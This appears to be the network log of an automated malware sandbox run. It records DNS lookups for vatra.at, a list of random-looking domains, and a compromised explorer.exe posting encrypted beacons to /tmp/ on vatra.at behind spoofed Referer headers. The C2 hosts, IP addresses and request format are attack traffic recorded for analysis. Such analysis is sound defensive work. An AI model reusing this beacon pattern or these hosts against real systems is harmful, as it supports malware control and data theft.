Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.959707975 CET	8.8.8.8	192.168.2.4	0x26d0	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

degroeneuitzender.nl

nrunfbf.net

vatra.at

utbgbuc.org

laatdiy.org

194.135.33.42

avjruv.net

fpmhvdgw.com

daffyjk.org

lubvvjyufy.com

tklmgewyg.net

gttbvxrpx.org

qsmspqgdlg.org

wgdttq.org

dotemlc.org

utctbvv.org

tduhcp.org

mwrunlqeb.com

npcojlss.net

yokcj.net

lrmfyx.net

wemmwd.net

ursbcr.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49701	5.135.247.111	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49695	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:18.067889929 CET	92	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nrunfbf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: vatra.at
Jan 8, 2023 16:15:18.067934036 CET	92	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 5d d1 e5 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA .[k,vu9]^.ar4![Z(<`8]7FQRR\&C%DE+4/4k[M=l<1_
Jan 8, 2023 16:15:18.914453030 CET	93	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 72 e8 85 eb Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49705	58.235.189.192	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:37.090270042 CET	1834	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gttbvxrpx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: vatra.at
Jan 8, 2023 16:15:37.090306044 CET	1834	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 67 4f b8 97 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vugOJ`pJ-VAu`i2zG{>QB\|A;9Gsj-='qz_=a:Rjy8EWL3sl17A{r$-]
Jan 8, 2023 16:15:37.973728895 CET	1835	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:37 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49706	211.40.39.251	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:38.258759022 CET	1836	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qsmspqgdlg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: vatra.at
Jan 8, 2023 16:15:38.258784056 CET	1836	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6c 29 ae fe Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vul)nFGOb3mQ!%27\)?~Ln+vW;fopLarRO8%BC
Jan 8, 2023 16:15:39.262161970 CET	1837	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:38 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49707	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:39.511301041 CET	1838	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wgdttq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 332 Host: vatra.at
Jan 8, 2023 16:15:39.511336088 CET	1838	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 58 2a b8 fc Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vuXlLOi\|U)7lUeYZ(C4L("\|GLHp`\llBgj\m--J/;ee[R@EtwA^B^
Jan 8, 2023 16:15:40.384287119 CET	1839	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:39 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49708	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:40.607968092 CET	1840	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dotemlc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 110 Host: vatra.at
Jan 8, 2023 16:15:40.607968092 CET	1840	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 56 0f b2 98 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vuVd(Dw:ZG
Jan 8, 2023 16:15:41.463578939 CET	1841	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:41 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49709	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:41.747809887 CET	1842	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://utctbvv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 300 Host: vatra.at
Jan 8, 2023 16:15:41.747833014 CET	1842	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 22 05 a5 fc Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vu"j?chp1.#1D<%(Z]O%Kxs$@ZWSy3]Jn}LuKX{sa(P
Jan 8, 2023 16:15:43.060590982 CET	1843	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:42 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49710	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:43.972069025 CET	1844	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tduhcp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: vatra.at
Jan 8, 2023 16:15:43.972130060 CET	1844	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 56 00 c5 bf Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vuV_SCLz=WI($r-waYrbn "(fG3G1#DWRX-?
Jan 8, 2023 16:15:44.843065023 CET	1845	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:44 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49711	211.119.84.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:45.639230967 CET	1846	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mwrunlqeb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: vatra.at
Jan 8, 2023 16:15:45.639254093 CET	1846	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 6c 4a f8 e9 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vulJXLnuY:Vfae9hm?oecS"g^Kov+Gq%^DNV5#rSn@_[f;/Zp;;Q}A_:d+&
Jan 8, 2023 16:15:46.912904978 CET	1847	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:46 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49712	211.40.39.251	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:47.651141882 CET	1848	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://npcojlss.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: vatra.at
Jan 8, 2023 16:15:47.651160002 CET	1848	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2f 3d b8 bf Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vu/=X"aNZe\|HC</})wE,w$F_^n4T(K[P@/aCR)J]r]"A>W5u{[r!pG6D9
